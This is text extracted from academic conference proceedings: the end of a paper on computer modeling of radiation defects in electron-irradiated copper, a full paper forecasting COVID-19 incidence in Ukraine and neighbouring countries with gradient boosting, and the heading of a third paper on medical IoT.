87.8388
89.1616
17
11.9049
1.2
0.5147
84.6496
89.1137
18
12.015
0.8
0.5483
78.8356
88.9659
19
14.2019
0.4
0.5803
62.6267
62.6256
Table 4. Energy, penetration depth, interaction cross-sections, approximation values of the interaction cross-section for electrons in Cu at E 0 = 6 meV №
dE/dx
E1
h
σ(E 1 )
σ(E 1 ) app.
1
13.6762
5.6
0.0291
91.3518
92.4689
2
13.5525
5.2
0.0585
91.4915
92.3207
3
13.4211
4.8
0.0882
91.6137
92.1475
4
13.2809
4.4
0.1181
91.7074
91.9433
5
13.1313
4.0
0.1484
91.7559
91.6972
6
12.9711
3.6
0.1791
91.7336
91.3948
7
12.7996
3.2
0.2101
91.6006
91.0158
8
12.6166
2.8
0.2416
91.2930
90.5235
9
12.4231
2.4
0.2735
90.7058
89.8608
10
12.224
2.0
0.3060
89.6602
88.9140
11
12.0349
1.6
0.3390
87.8388
87.4571
12
11.9049
1.2
0.3724
84.6496
84.9370
13
12.015
0.8
0.4059
78.8356
79.5985
14
13.6762
0.4
0.4380
62.6267
62.5241
Computer Modeling of Processes of Radiation Defect Formation
493
Table 5. Energy, penetration depth, interaction cross-sections, approximation values of the interaction cross-section for electrons in Cu at E 0 = 4 meV №
dE/dx
E1
h
σ(E 1 )
σ(E 1 ) app.
1
13.0526
3.8
0.0153
91.7557
92.3390
2
12.9711
3.6
0.0307
91.7336
92.1521
3
12.8868
3.4
0.0461
91.6842
91.9044
4
12.7996
3.2
0.0617
91.6006
91.7090
5
12.7095
3.0
0.0774
91.4739
91.4419
6
12.6166
2.8
0.0932
91.2930
91.1361
7
12.521
2.6
0.1091
91.0432
90.7828
8
12.4231
2.4
0.1251
90.7058
90.3690
9
12.3236
2.2
0.1413
90.2558
89.8776
10
12.224
2.0
0.1576
89.6602
89.2848
11
12.1264
1.8
0.1740
88.8746
88.5573
12
12.0349
1.6
0.1906
87.8388
87.6370
13
11.9567
1.4
0.2072
86.4695
86.4522
14
11.9049
1.2
0.2240
84.6496
84.8475
15
11.9057
1.0
0.2408
82.2048
82.5848
16
12.015
0.8
0.2575
78.8356
79.1806
17
12.3696
0.6
0.2740
73.7620
73.5260
Table 6. Energy, penetration depth, interaction cross-sections, approximation values of the interaction cross-section for electrons in Cu at E 0 = 2 meV №
dE/dx
E1
h
σ(E1 )
σ(E1 ) app.
1
12.1748
1.9
0.0082
89.2945
89.3561
2
12.1264
1.8
0.0164
88.8746
88.8952
3
12.0796
1.7
0.0247
88.3925
88.3792
4
12.0349
1.6
0.0330
87.8388
87.8051
5
11.9935
1.5
0.0413
87.2022
87.1625
6
11.9567
1.4
0.0497
86.4695
86.4291
7
11.9263
1.3
0.0580
85.625
85.6057
8
11.9049
1.2
0.0664
84.6496
84.6502
9
11.8963
1.1
0.0748
83.5196
83.5428
10
11.9057
1.0
0.0832
82.2048
82.2442
11
11.9412
0.9
0.0916
80.6641
80.7000
12
12.015
0.8
0.1000
78.8356
78.8332
13
12.1467
0.7
0.1083
76.6108
76.5618
14
12.3696
0.6
0.1164
73.7620
73.7774
494
T. Shmygaleva and A. Srazhdinova
Fig. 3. Dependency of CPFs for electrons in copper on the number of interplays at E 0 = 6 meV; h = 0.1; 0.2; 0.3; 0.4 cm (1–4)
Fig. 4. Dependency of CPFs for electrons in copper on h at n = 2, 4, 6, 8, 10, 12, 14; E 0 = 4 meV (1–7)
Computer Modeling of Processes of Radiation Defect Formation
495
Fig. 5. PBOA spectrum at various values of depth in copper during electrons irradiation of energy E 0 = 1 and 10 meV: 1–1 meV, 0.2 mm; 2–1 meV, 0.4 mm; 3–10 meV, 2 mm; 4–10 meV, 4 mm
Fig. 6. Distribution of defects per incident electron at depth at different E 0 in copper: 1,3–1; 2, 4–2 meV; curves 1, 2 – C d with use of spectrum taking into account energy losses, 3, 4 – C d using spectrum by simple formula (8)
496
T. Shmygaleva and A. Srazhdinova
Fig. 7. Program code for calculating the spectra of PBOA
Computer Modeling of Processes of Radiation Defect Formation
497
Fig. 8. Program code for calculating the concentration of radiation defects
5 Conclusions Thus, in the work, the modeling of the processes of radiation defect formation in materials irradiated with electrons is carried out. The selection of an approximation expression is carried out and approximation parameters are found for various values of the initial energy. The difficulties and peculiarities of the selection of approximation coefficients are revealed. The selection is carried out in such a way that the theoretical correlation ratio is as close as possible to 1. Calculations of cascade probabilistic functions are performed depending on the number of interactions and the depth of particle penetration. The behavior of these functions is analyzed. The expressions for CPFs are then used to calculate the spectra of PBOA and the concentration of defects. Algorithms for calculating the spectra of primary dislodged atoms and the concentration of radiation defects are presented. Calculations of the PBOA spectrum depending on the energy at different values of the initial energy, at different values of depths, are performed. Calculations of the concentration of radiation defects are made. The results of calculations of the defect concentration are compared with calculations performed earlier using a simple formula without taking into account energy losses for the spectra of PBOA. It is shown that when calculating the parameters of radiation defect formation, it is necessary to take into account energy losses for ionization and excitation. The results of calculating point defects are compared with the experiment. There is a good concordance, the
498
T. Shmygaleva and A. Srazhdinova
discrepancy between the calculated and experimental data is 3%. The models and algorithms obtained in the work can be used by specialists in the field of solid-state radiation physics, cosmophysics and applied mathematics.
References 1. Komarov, F.F.: Nano- and microstructuring of solids by swift heavy ions. Phys. Usp. 187, 465–504 (2017) 2. Lubov, M.N., Kulikov, D.V., Kurnosikov, O., Trushin, Y.V.: Kinetic simulation of the 3D growth of subsurface impurity nanoclusters during cobalt deposition onto a copper surface. Bull. Russ. Acad. Sci. Phys. 78, 682–685 (2014) 3. Bersenev, V.M., Pogrebnyak, A.D., Turbin, P.V., Dub, S.N., Kirik, G.V., Kylyshkanov, M.K.: Tribotechnical and mechanical properties of Ti-Al-N nanocomposite coatings deposited by the ion-plasma method. J. Friction Wear 31, 349–355 (2010) 4. Klimovich, I.M., Komarov, F.F., Zaikova, V.A., Kuleshova, A.K., Pilkob, V.V.: Influence of parameters of reactive magnetron sputtering on tribomechanical properties of protective nanostructured Ti-Al-N coatings. J. Friction Wear 39, 92–98 (2018) 5. Makhavikou, M., Parkhomenko, I., Vlasukova, L., Komarov, F., Milchanin, O., Mudryi, A.: Raman monitoring of ZnSe and ZnS x Se l-x nanocrystals formed in SiO 2 by ion implantation. Nuclear Instr. Meth. Phys. Res. Sect. B: Beam Interact. Mater. Atoms. 1–4 (2018) 6. Vlasukova, L.A., Komarov, F.F., Yuvchenko, V.N., Skuratov, V.A., Kislitsyn S.B.: A new nanoporous material based on amorphous silicon dioxide. Bull. Russ. Acad. Sci. Phys. 5, 582–587 (2012) 7. Sarsembinov, S.S., Prikhodko, O.Yu., Ryaguzov, A.P., Maksimova, S.Yu., Daineko, Yu.A., Makhmud, F.A.: Electronic properties of diamond-like carbon films modified with silver nanoclusters. Phys. Stat. Solidi (C) Curr. Top. Solid St. Phys. 7, 805–807 (2010) 8. Makhavikou, M.A., et al.: Effect of implantation temperature and annealing on synthesis of ZnSe nanocrystals in silica by ion implantation. In: Pogrebnjak, A.D., Novosad, V. (eds.) Advances in Thin Films, Nanostructured Materials, and Coatings. LNME, pp. 377–386. Springer, Singapore (2019). https://doi.org/10.1007/978-981-13-6133-3_37 9. Potekaev, A.I., et al.: Radiation stability of triple coatings based on transition-metal nitrides under irradiation by alpha particles and argon ions. Rus. Phys. J. 1, 99–108 (2016) 10. Kulikov, D.V., Lubov, M.N., Trushin, Y.V., Kharlamov, V.S.: Kinetic modeling of the growth of copper clusters of various heights in subsurface layers of lead. Tech. Phys. Lett. 41(10), 961–963 (2015). https://doi.org/10.1134/S1063785015100090 11. Makhavikou, M., et al.: Structure and optical properties of SiO 2 films with ZnSe nanocrystals formed by ion implantation. Surface Coatings Tech. 596–600 (2018) 12. Lisitsyn, V.M., Tarasesko, V.F., Polusadova, E.F., Baksht, E.H., Valiev, D.T., Burachenko, A.G.: Pulsed cathodoluminescence of minerals excited by nanosecond and subnanosecond electron beams. Radiation Phys. Chem. Condensed Matter. News High. Educ. Instit. Phys. 55, 95–99 (2012) 13. Lisitsyn, V.M., Lisitsyna, L.A., Karipbayev, Z.T., Valiev, D.T., Stepanov, S.A.: Two possible causes of the stage of emission buildup after excitation by a nanosecond electron flux pulse. Opt. Mater. 42, 325–330 (2015) 14. Ghyngazov, S.A.: Zirconia ceramics processing by intense electron and ion beams. Methods Phys. Res. 435, 190–193 (2018) 15. Tulegenova, M., Ilyin, A., Guseinov, N., Beall, G., Kuanyshbekov, T.: Computer simulation of the effect of structural defects on the effectiveness of the graphene’s protective properties. J. Comput. Theor. Nanosci. 16, 351–354 (2019)
Computer Modeling of Processes of Radiation Defect Formation
499
16. Pezoldt, J., Kharlamov, V.S., Kulikov, D.V., Lubov, M.N., Trushin, Y.V.: Concentration profile simulation of SiC/Si heterostructures. In: Materials Science Forum, vol. 858, pp. 501–504 (2016) 17. Konstantinov, S.V., Komarov, F.F.: Effects of nitrogen selective sputtering and flaking of nanostructured coating TiN, NiAlN, Tialyn, TiCrN, (TiHfzrVNB)n under helium ion irradiation. Acta Phys. Polonica A 136, 303–309 (2019) 18. Kupchishin, A.A., Voronova, N., Shmygaleva, T.A., Kupchishin, A.I.: Computer simulation of vacancy clusters distribution by depth in molybdenum irradiated by alpha particles. In: Key Engineering Materials, vol. 781, pp. 3–72 (2018) 19. Boos, E.G., Kupchishin, A.A., Kupchishin, A.I., Shmygalev, E.V., Shmygaleva, T.A.: Cascade and Probabilistic Method, Solution of Radiation and Physical Tasks, Boltzmann’s Equations. Communication with Markov’s Chains. Almaty, Kazakhstan (2015) 20. Shmygaleva, T.A., Srazhdiniva, A.A., Shafii, S.: Computer-based modeling of radiation defect parameters in materials irradiated with charged particles. In: Journal of Physics: Conference Series, vol. 2032 (2021) 21. Kupchishin, A.I., Kupchishin, A.A., Shmygaleva, T.A., Shafii, S.A.: Computer simulation of the energy spectra of PKA in materials irradiated by protons in the framework of the cascadeprobabilistic method. In: IOP Conference Series: Materials Science and Engineering, vol. 510, pp. 1–6 (2019)
Information Systems in Medicine
Forecasting of COVID-19 Epidemic Process in Ukraine and Neighboring Countries by Gradient Boosting Method Dmytro Chumachenko1(B) , Tetyana Chumachenko2 , Ievgen Meniailov1 , Olena Muradyan3 , and Grigoriy Zholtkevych3 1 National Aerospace University “Kharkiv Aviation Institute”, Kharkiv, Ukraine
[email protected] 2 Kharkiv National Medical University, Kharkiv, Ukraine 3 V.N. Karazin Kharkiv National University, Kharkiv, Ukraine
Abstract. The new coronavirus has changed the life of the planet and continues to spread around the world. Mathematical modeling allows the development of effective scientifically substantiated preventive and anti-epidemic measures. Machine learning methods have the highest accuracy when constructing the predicted incidence of infectious diseases. In this work, a model of gradient boosting is built to calculate the predicted incidence of COVID-19. To investigate epidemic process in Ukraine, we have built simulation model for Ukraine and its neighbors: Belarus, Hungary, Moldova, Poland, Romania, Russia, Slovakia. To verify the model, real data on the incidence of coronavirus were used. These countries were chosen because they have different dynamics of the epidemic process, different control measures and influenced the dynamics of COVID-19 epidemic process in Ukraine. Keywords: Epidemic model · epidemic process simulation · COVID-19 · machine learning · gradient boosting
1 Introduction Coronavirus infection (COVID-19) causes severe acute illness with the development of respiratory distress syndrome in some cases. Cases of COVID-19 infection have been reported in most countries of the world on all continents. Currently (May, 2021), more that 174 million people have been infected in the world, over 3.5 million deaths associated with an infectious disease have been registered [1]. The most affected regions are the USA, India, Brazil, France and some other countries on various continents. The disease caused by the new coronavirus has been named by WHO “COVID-19,” a new acronym derived from Coronavirus Disease 2019. Mathematical modeling is an effective tool for studying the epidemic process of COVID-19. Morbidity models make it possible to predict its dynamics, as well as to identify the factors that have the greatest influence on the development of the epidemic © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 503–514, 2023. https://doi.org/10.1007/978-3-031-35467-0_30
504
D. Chumachenko et al.
[2]. This allows decision-makers to implement evidence-based, effective anti-epidemic and control measures to contain the COVID-19 pandemic in specific areas. Modeling of epidemic processes has been known since the beginning of the 20th century with the approach of Kermack and McKendrick [3], who improved the Ross model for malaria modeling. They found specific population density thresholds for different states of infectivity, recovery, and mortality. This approach is called compartmental modeling and is still used in public health today. The study [4] considers the classical SIR model, with the states Susceptible, Infected, Recovered, to simulate the dynamics of COVID-19. Global stability is calculated using the Lyapunov function and local stability – using the Jacobian matrix. Through modeling, the authors show that social distancing is the best way to control the spread of COVID-19. Article [5] is also devoted to applying the classical SIR model to simulate the dynamics of COVID-19 in Saudi Arabia. At the same time, the model considers the non-linear frequency of removal of individuals from the model, which depends on the ratio of the number of hospital beds. Numerical modeling determines the impact of the hospital bed ratio and public awareness on disease control. However, the use of the model on actual data is difficult. Studies [6, 7] extend the classical SIR model with the state E – exposed. In [6], the authors solve a system of differential equations using the Runge-Kutta method of the fourth and fifth orders. The results show that quarantine and isolation of contact individuals can help to reduce the spread of COVID-19. In [7], the authors consider the effects of varying degrees of containment and uncertainties in reported incidence to predict the spread of COVID-19 in certain areas. However, despite significant complications in building compartmental models for modeling the dynamics of COVID-19, they have some disadvantages [8]. The disadvantages include low accuracy, high complexity, low adaptability, and the inability to automatically take into account factors that change in the dynamics of the epidemic process when the virulence of the infection changes. Therefore, the most promising approach for modeling the dynamics of COVID-19 is machine learning. The aim of the study is to develop a machine learning model for the COVID-19 epidemic process based on the gradient boosting method.
2 Analysis of COVID-19 Epidemic Process To verify the model, we have used data on the daily incidence of COVID-19 in Ukraine and neighboring countries: Belarus, Hungary, Moldova, Poland, Romania, the Russian Federation and Slovakia, obtained from the Johns Hopkins University Coronavirus Resource Center. The choice of such countries also makes it possible to assess the adequacy of the model, since they have different dynamics of the development of the COVID-19 pandemic, and different anti-epidemic measures implemented at different times. In Ukraine, the coronavirus infection Covid-19 (new type of pneumonia) was first diagnosed on March 3, 2020 in Chernivtsi. On March 13, the first death was recorded as a result of a coronavirus infection. As of May 2021, more than 2 million cases were confirmed in Ukraine, of which more than 50 thousand were fatal [9]. There is no exact
Forecasting of COVID-19 Epidemic Process in Ukraine
505
data on those infected with COVID-19 in the occupied territories. In the occupied Crimea, according to the Johns Hopkins University, as of May 2021, there were about 70 thousand cases and about 2 thousand deaths. There is no reliable information on the occupied regions of Donbass. When analyzing the incidence of COVID-19 in Ukraine, data on the occupied territories of Donetsk, Luhansk regions and Crimea were not taken into account. The COVID-19 epidemic in Ukraine is characterized by territorial distribution. The government assigns the country’s regions to one of four quarantine zones, depending on the dynamics of morbidity and hospital congestion: green, yellow, orange and red. As of January 2022, more than 4 million cases were registered in Ukraine, of which more than 100 thousand were fatal. The number of registered cases of coronavirus in Belarus as of May 2021 is more than 380 thousand. At the same time, the number of deaths per day is increasing and is more than 2.5 thousand for the entire period of the spread of the infection [10]. Such data follow from the message of the press service of the Ministry of Health. However, the statistics on the incidence of coronavirus in Belarus is significantly underestimated. Since mid-April 2020, the Belarusian Ministry of Health has practically stopped contacting the media on the topic of coronavirus. According to the data provided by the country to the UN, in the second quarter of 2020 there were 3,000 more deaths than in the same period of 2019. As of January 2022, more than 740 thousand cases were registered in Belarus, of which more than 6 thousand were fatal. As of May 2021, Hungary has vaccinated more than a half of its population, but it continues to be one of the worst in the world in terms of COVID-19 deaths per capita. Hungary introduced the both doses of vaccine to 63.42% of its population, according to the European Center for Disease Prevention and Control [11]. But Hungary’s high vaccination rate, the result of a procurement strategy that includes doses from China and Russia in addition to those provided by the EU, has failed to slow the pandemic spike, which has led to the world’s highest two-week per capita death rate, according to Johns Hopkins University. As of January 2022, more than 1.5 million cases were registered in Hungary, of which more than 40 thousand were fatal. The first case of COVID-19 in Moldova was diagnosed on March 7, 2020. A woman returning from Italy tested positive for the new coronavirus. As the number of infected people began to rise, on March 17, 2020, the parliament declared a state of emergency throughout Moldova for a period of 60 days. The first death from COVID-19 was recorded on March 18, 2020. On March 23, 2020, the total number of confirmed cases exceeded 100, and on April 7, this number exceeded 1,000 cases. By April 10, cases were confirmed in all regions of the country, including the Transnistrian region. On April 27, 2020, the total number of deaths exceeded 100 [12]. As of January 2022, more than 440 thousand cases were registered in Moldova, of which more than 10.5 thousand were fatal. From March 14, 2020, according to the order of the Minister of Health of the country, Lukasz Šumovski, an epidemic threat has been declared in Poland. In the period from March 14 to March 20, an epidemic threat was in effect in Poland, and from March 15, a cordon sanitaire was introduced on the borders of Poland, significantly limiting border traffic. According to the decree of the Minister of Health, an epidemic has been operating in Poland since March 20 [13]. By May 2021, there were over 2.5 million cases of
506
D. Chumachenko et al.
infection; of which almost 75 thousand people died. In connection with the development of the second wave of the epidemic, the government decided to create temporary hospitals for patients with COVID-19. The first hospital was opened on October 29, 2020 at the National Stadium in Warsaw, and over time, at least one such facility has been built in each voivodeship. As of January 2022, almost 5 million cases were registered in Poland, of which more than 100 thousand were fatal. In Romania, only cases of importation from Italy were initially confirmed for people who came from that country or had contact with a person from that country. An important source of infection in Romania is people from outside who have not isolated at home or lied that they were not in an area affected by COVID-19 infection. Former Minister of Health Viktor Kostash said that of the 277 cases confirmed by March 19, 2020, more than 80% were imported cases, and the rest were contacts of imported cases [14]. As of January 2022, more than 2.2 million cases were registered in Romania, of which more than 60 thousand were fatal. According to the operational headquarters, the spring peak of the incidence of COVID-19 in Russia took place on May 11, when the number of infected people detected per day was 11,656 people. In the summer months, there was a tangible decline in the incidence of COVID-19 in Russia. However, the recession was replaced by an increase in the fall, and the spring incidence rates were surpassed. In particular, on December 6, 2020, the number of infected persons detected per day exceeded 29 thousand. In addition, there are unofficial estimates of the number of people infected. In particular, according to the estimates of Sberbank specialists, which were obtained by modeling based on official data and testing statistics of its employees, the number of Russian residents who have recovered from COVID-19 by the end of 2020 will reach 16.6 million, or 11.3% of the population. The bank explains the 5–6 times excess of the official data by cases of mild and asymptomatic course of the disease [15]. As of January 2022, more than 11.8 million cases were registered in Russia, of which more than 300 thousand were fatal, and it ranks 6th in the world in terms of the number of cases. The first preventive measures in Slovakia were taken in February 2020, when the Central Crisis Headquarters first met at the Ministry of Health of the Slovak Republic. The first measures against the epidemic were taken on March 6, 2020, and a state of emergency was declared on March 12. Schools have been closed since March 16, 2020, and the state of emergency lasted until June 14, 2020. On October 1, 2020, the government again declared a state of emergency, which lasted 45 days until November 14, 2020. The government has extended it 3 times, most recently on February 8, 2021, and it must be valid for 40 days until March 19. Schooling for the 2020/2021 school year was interrupted on 12 October 2020 and did not resume until the end of the 2020 calendar year [16]. As of January 2022, more than 1 million cases were registered in Slovakia, of which more than 17 thousand were fatal.
3 Gradient Boosting Model Boosting is an ensemble building technique in which predictors are not built independently, but sequentially [17]. This technique takes advantage of the idea that the next model will learn from the mistakes of the previous one. They have an unequal likelihood
Forecasting of COVID-19 Epidemic Process in Ukraine
507
of appearing in subsequent models, and the ones with the greatest error will appear more often. Predictors can be chosen from a wide variety of models, such as decision trees, regression, classifiers, etc. Since predictors learn from previous mistakes, it takes less time to get to the real answer. But we must choose the stopping criterion with care, otherwise it can lead to overfitting. Gradient boosting is a popular boosting algorithm. It sequentially adds new ones to the previous models so that the errors made by the previous predictors are corrected. Gradient Boosting attempts to train new models on the residual error of the past while moving to the minimum of the loss function [18]. The Gradient Boosting algorithm consists of the following steps [19]: the model is built from a collection of data; this model makes predictions for the entire dataset; errors are calculated from predictions and true values; the new model is built taking into account errors as target variables. In doing so, we strive to find the best separation to minimize errors; the predictions made with this new model are combined with the predictions of the previous ones; the errors are calculated again using these predicted values and true values; this process is repeated until the error function stops changing or until the maximum number of predictors is reached. Let’s construct a generalized gradient boosting model. Let some differentiable loss function L(y, z) be given. Let’s construct a weighted sum of basic algorithms: aN (x) =
N n=0
γn bn (x).
(1)
Selection methods of b0 (x): the most popular class (for classification): b0 (x) = argmax
l i=1
[γi = y];
(2)
the average answer (for regression): b0 (x) =
1 l γi . i=1 l
(3)
Suppose we have constructed a composition aN−1 (x) from N − 1 algorithm, and we want to choose the following basic algorithm bN (x) so as to reduce the error as much as possible: l i=1
L(yi , aN −1 (xi ) + γN bN (xi )) → minbN ,γN ;
l i=1
L(yi , aN −1 (xi ) + si ) → mins1 ,...,sl ; ∂L si = − ; ∂z z=aN −1 (xi )
the vector of shifts s = (s1 ,…,s ) coincides with the antigradient l ∂L (− )li=1 = −∇z L(yi , zi )|zi =aN −1 (xi ) ; i=1 ∂z z=aN −1 (xi )
(4) (5) (6)
(7)
508
D. Chumachenko et al.
bN (x) = argmin γN (x) = argmin
l i=1
l
(b(xi ) − si )2 ;
(8)
L(yi , aN −1 (xi ) + γ bN (xi )).
(9)
i=1
If the basic algorithms are very simple, then they poorly approximate the antigradient vector. In fact, adding such a basic algorithm would correspond to a step along a direction that is very different from the steepest decreasing direction. If the basic algorithms are complex, then they are able to perfectly fit the training set in several steps of boosting, which will be overfitting due to the excessive complexity of the family of algorithms. Let’s consider a special case of gradient boosting for a regression task. 1 l (a(xi ) − γi ) → mina ; (10) i=1 2 N aN (x) = bn (x); (11) n=1
b1 (x) = argmin (1)
si
1 l (b(xi ) − yi )2 ; i=1 2
= yi − b1 (xi );
(12) (13)
1 l (1) (b(xi ) − si )2 . (14) i=1 2 Each next algorithm will also be adjusted to the remains of the previous ones: N −1 (N ) si = yi − bn (xi ) = yi − aN −1 (xi ); (15) b2 (x) = argmin
n=1
1 l (N ) (b(xi ) − si )2 . i=1 2 Residuals can be found as the antigradient of the loss function: ∂ 1 (N ) 2 si = yi − aN −1 (xi ) = − (z − yi ) . ∂z 2 z=aN −1 (xi ) bN (x) = argmin
(16)
(17)
Thus, such a basic algorithm that will reduce the composition error as much as possible is chosen. This property follows from its proximity to the antigradient of the functional on the training set.
4 Experiments and Results The COVID-19 epidemic process model was verified against daily statistics on new cases in Ukraine, Belarus, Hungary, Moldova, Poland, Romania, the Russian Federation and Slovakia. We used data provided by the Public Health Center of Ukraine under the Ministry of Health of Ukraine for Ukrainian data, and data from the Johns Hopkins University Coronavirus Resource Center for countries neighboring Ukraine. The metrics for assessing the adequacy of the model were the mean absolute error (MAE) and the mean square error (MSE).
Forecasting of COVID-19 Epidemic Process in Ukraine
509
Fig. 1. COVID-19 forecasting for Belarus
Forecast for Belarussian data is presented in Fig. 1. MAE is 463.82. MSE is 457,336.11. Forecast for Hungarian data is presented in Fig. 2. MAE is 545.109. MSE is 954,897.51.
Fig. 2. COVID-19 forecasting for Hungary
Forecast for Moldavian data is presented in Fig. 3. MAE is 275.75. MSE is 166,087.96. Forecast for Polish data is presented in Fig. 4. MAE is 2,151.16. MSE is 13,180,096.34. Forecast for Romanian data is presented in Fig. 5. MAE is 1,062.50. MSE is 2,633,408.14. Forecast for Russian Federation data is presented in Fig. 6. MAE is 5,855.17. MSE is 75,234,523.83. Forecast for Slovakian data is presented in Fig. 7. MAE is 261.20. MSE is 232,483.32.
510
D. Chumachenko et al.
Fig. 3. COVID-19 forecasting for Moldova
Fig. 4. COVID-19 forecasting for Poland
Forecast for Ukrainian data is presented in Fig. 8. MAE is 2,223.71. MSE is 11,929,595.02.
5 Discussion Since the beginning of the pandemic, many research groups have been working on studying the coronavirus. Three main approaches are used to predict the dynamics of COVID-19: compartmental models, multi-agent models, and machine learning [20]. Machine learning models show the highest prediction accuracy. At the same time, they can be divided into two types: based on neural networks and statistical methods. A limitation of models based on neural networks is their high computational complexity. This is not always possible when used in public health settings that do not have computing capabilities.
Forecasting of COVID-19 Epidemic Process in Ukraine
511
Fig. 5. COVID-19 forecasting for Romania
Fig. 6. COVID-19 forecasting for Russian Federation
Especially relevant is the use of models based on statistical machine learning in emergencies where resources are limited. The use of such models is of critical importance in the context of Russia’s war in Ukraine. Russia’s wanton and bloody invasion of Ukraine resulted in substantial human casualties and contributed to the spread of COVID-19. Factors that contribute to the spread of COVID-19 in Ukraine during wartime include: • Difficulty in identifying cases associated with the temporary occupation of territories and active hostilities. • Difficulties in diagnosis associated with the reduction of medical facilities and the redistribution of resources for the needs of military and civilian victims. • Problems with the registration of morbidity associated with problems in the transfer of information to the Public Health Center of the Ministry of Health of Ukraine.
512
D. Chumachenko et al.
Fig. 7. COVID-19 forecasting for Slovakia
Fig. 8. COVID-19 forecasting for Ukraine
• Non-compliance with anti-epidemic measures associated, on the one hand, with a high population density in bomb shelters and during the evacuation, on the other hand, with mental health, which pushed the problem of the pandemic into the background after the war. • Failure in the preventive policy associated with the disruption of routine vaccination. Therefore, the COVID-19 dynamics model developed in this study based on the Gradient Boosting method is an effective tool for prompt decision-making regarding implementing preventive measures in medical institutions. The disadvantage of the model is the impossibility of determining the factors influencing the development of morbidity, therefore, a promising area of research is the creation of a combined machine learning model using a multi-agent approach. Through the use of machine learning models, multi-agent models will increase the accuracy of
Forecasting of COVID-19 Epidemic Process in Ukraine
513
forecasting, while it will be possible to conduct experimental studies to evaluate the effectiveness of the implemented anti-epidemic measures.
6 Conclusions Evaluation of a built-in machine learning model based on the gradient boosting method for predicting the incidence of COVID-19 has shown that it can be used in public health practice to implement anti-epidemic measures. Depending on the duration of the constructed forecast, it can be used by public health professionals to solve various problems: operational analysis of the effectiveness of implemented control measures, evaluation of the effectiveness of planned restrictive and preventive measures, assessment of the amount of resources needed to provide patients with proper care (number of beds, oxygen supply, number of medical personnel, etc.). The use of simulation modeling makes it possible to take into account the factors influencing the dynamics of the epidemic process and scientifically substantiate the need for the introduction of anti-epidemic measures aimed at stopping the pandemic in certain areas. The forecasts for countries neighboring Ukraine allow us to develop an effective entry policy into the country, as well as assess the risks associated with the dynamics of COVID-19 in the surrounding territories. Acknowledgement. The study was funded by the Ministry of Education and Science of Ukraine in the framework of the research project 0121U109814 on the topic “Sociological and mathematical modeling of the effectiveness of managing social and epidemic processes to ensure the national security of Ukraine” [21].
References 1. Lu, X., Xing, Y., Wong, G.W.: COVID-19: lessons to date from China. Arch. Dis. Child. 105(12), 1146–1150 (2020). https://doi.org/10.1136/archdischild-2020-319261 2. Izonin, I., et al.: Predictive modeling based on small data in clinical medicine: RBF-based additive input-doubling method. Math. Biosci. Eng. 18(3), 2599–2613 (2021). https://doi.org/ 10.3934/mbe.2021132 3. Kermack, W.O., McKendrick, A.G.: A contribution to the mathematical theory of epidemics. Proc. R. Soc. A: Math. Phys. Eng. Sci. 115(772), 700–721 (1927). https://doi.org/10.1098/ rspa.1927.0118 4. ud Din, R., Algehyne, E.A.: Mathematical analysis of COVID-19 by using SIR model with convex incidence rate. Results Phys. 23, 103970 (2021). https://doi.org/10.1016/j.rinp.2021. 103970 5. Ajbar, A., Alqahtani, R.T., Boumaza, M.: Dynamics of an SIR-based COVID-19 model with linear incidence rate, nonlinear removal rate, and public awareness. Front. Phys. 9, 634251 (2021). https://doi.org/10.3389/fphy.2021.634251 6. Mwalili, S., Kimathi, M., Ojiambo, V., Gathungu, D., Mbogo, R.: SEIR model for COVID19 dynamics incorporating the environment and social distancing. BMC. Res. Notes 13, 352 (2020). https://doi.org/10.1186/s13104-020-05192-1 7. Lopez, L., Rodo, X.: A modified SEIR model to predict the COVID-19 outbreak in Spain and Italy: simulating control scenarios and multi-scale epidemics. Results Phys. 21, 103746 (2021). https://doi.org/10.1016/j.rinp.2020.103746
514
D. Chumachenko et al.
8. Moein, S., et al.: Inefficiency of SIR models in forecasting COVID-19 epidemic: a case study of Isfahan. Sci. Rep. 11, 4725 (2021). https://doi.org/10.1038/s41598-021-84055-6 9. Moroz, O., Stepashko, V.: Case study of the Ukraine Covid epidemy process using combinatorial-genetic method. In: 2020 IEEE 15th International Conference on Computer Sciences and Information Technologies, pp. 17–20 (2020). https://doi.org/10.1109/CSIT49 958.2020.9322000 10. Karath, K.: Covid-19: how does Belarus have one of the lowest death rates in Europe? BMJ 370 (2020). https://doi.org/10.1136/bmj.m3543 11. Galvan, V., Quarleri, J.: An evaluation of the SARS-CoV-2 epidemic 16 days after the end of social confinement in Hungary. GeroScience 42(5), 1221–1223 (2020). https://doi.org/10. 1007/s11357-020-00237-6 12. Mavragani, A.: Tracking COVID-19 in Europe: infodemiology approach. JMIR Public Health Surveill. 6(2), e18941 (2020). https://doi.org/10.2196/18941 13. Chmielik, E., et al.: COVID-19 autopsies: a case series from Poland. Pathobiology 88(1), 78–87 (2021). https://doi.org/10.1159/000512768 14. Dascalu, S.: The successes and failures of the initial COVID-19 pandemic response in Romania. Front. Public Health 8, 344 (2020). https://doi.org/10.3389/fpubh.2020.00344 15. Lancet, T.: Salient lessons from Russia’s COVID-19 outbreak. The Lancet 395(10239), 1739 (2020). https://doi.org/10.1016/S0140-6736(20)31280-0 16. Holt, E.: COVID-19 lockdown of Roma settlements in Slovakia. Lancet Infect. Dis. 20(6), 659 (2020) 17. Nechyporenko, A.S., et al.: Comparative characteristics of the anatomial structure of the ostiomeatal complex obtained by 3D modeling. In: Proceedings of the 2020 IEEE International Conference on Problems of Infocommunications Science and Technology (PIC S and T 2020), pp. 407–411 (2021). https://doi.org/10.1109/PICST51311.2020.9468111 18. Davidich, N., et al.: Monitoring of urban freight flows distribution considering the human factor. Sustain. Cities Soc. 75, 103168 (2021). https://doi.org/10.1016/j.scs.2021.103168 19. Borysenko, V., Kondratenko, G., Sidenko, I., Kondratenko, Y.: Intelligent forecasting in multicriteria decision-making. In: CEUR Workshop Proceedings, vol. 2608, pp. 966–979 (2020) 20. Comito, C., Pizzuti, C.: Artificial intelligence for forecasting and diagnosing COVID-19 pandemic: a focused review. Artif. Intell. Med. 128, 102286 (2022). https://doi.org/10.1016/ j.artmed.2022.102286 21. Boyko, D., et al.: The concept of decisions support system to mitigate the COVID-19 pandemic consequences based on social and epidemic process intelligent analysis. In: CEUR Workshop Proceedings, vol. 3003, pp. 55–64 (2021)
The Internet of Medical Things in the Patient-Centered Digital Clinic’s Ecosystem Inna Kryvenko(B) , Anatolii Hrynzovskyi, and Kyrylo Chalyy Bogomolets National Medical University, Kyiv, Ukraine [email protected]
